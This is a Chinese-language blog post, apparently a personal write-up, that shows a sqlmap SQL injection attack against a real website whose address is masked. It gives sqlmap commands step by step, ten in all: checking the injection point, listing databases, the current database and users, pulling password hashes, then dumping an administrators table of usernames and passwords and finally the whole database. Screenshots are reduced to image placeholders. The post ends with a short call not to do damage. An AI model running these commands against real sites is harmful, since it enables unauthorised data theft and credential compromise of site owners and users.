某日,发现一个sql注入点,http://www.******.com/subcat.php?id=2打算***一下(为了不泄露信息,网址全打码)。


科普一下:

SQLMAP 是一款开源的***测试程序,它可以自动探测和利用 SQL 注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据;当然,最猥琐的是它利用注入点***的速率还是灰常让人满意的。


***开始:

  1. 首先检查一下注入点是否可用


    sqlmap -u http://www.******.com/subcat.php?id=2 --batch

    --batch:中间避免手动输入Y来确认

    一次sqlmap***实例_第1张图片

可见注入点是可以使用的。


2.暴库,看看都有哪些数据库:

#sqlmap -u   --dbs

一次sqlmap***实例_第2张图片

如上图,爆出了5个数据库。


3.找出web当前使用的是哪个数据库:

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-db

wKiom1dzkOTxynBZAAAZ1CiJ3Wk860.png


4.找出web当前数据库的账户:

#sqlmap -u http://www.******.com/subcat.php?id=2 --current-user

wKiom1dzkXPhBV5TAAAYg4qBaxc009.png


5.列出数据库所有用户:

#sqlmap -u http://www.******.com/subcat.php?id=2 --users

一次sqlmap***实例_第3张图片

可以看书只有一个用户。


6.获取数据库账户与密码:

#sqlmap -u http://www.******.com/subcat.php?id=2 --passwords


7.获取当前数据库的所有表:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history --tables

 -D:指定数据库

一次sqlmap***实例_第4张图片


8.找出表中都有哪些字段:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators --columns

 -T:指定表

一次sqlmap***实例_第5张图片

可以看出表中有5个字段。


9.爆字段内容:

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --dump

 -C:指定字段

 --dump:导出,否则shell上不会显示内容,只能到日志中查看

若内容太多,可以指定显示那一部分:

 --start:指定导出的开始的行

 --stop:指定导出结束的行

#sqlmap -u http://www.******.com/subcat.php?id=2 -D bible_history -T administrators -C admin_first_name,admin_id,admin_last_name,admin_password,admin_username --start 1 --stop 10 --dump

一次sqlmap***实例_第6张图片

如上,爆出了字段的内容,及获得了用户名和密码,有的密码是经过hash加密的需要破解。



10.***:

#sqlmap -u http://www.******.com/subcat.php?id=2 --dump-all

wKioL1dzlLzzWqL_AACLC6etTbg394.png

上图为拖的库的一部分。


为了和谐的网络环境,大家不要做破坏的事情。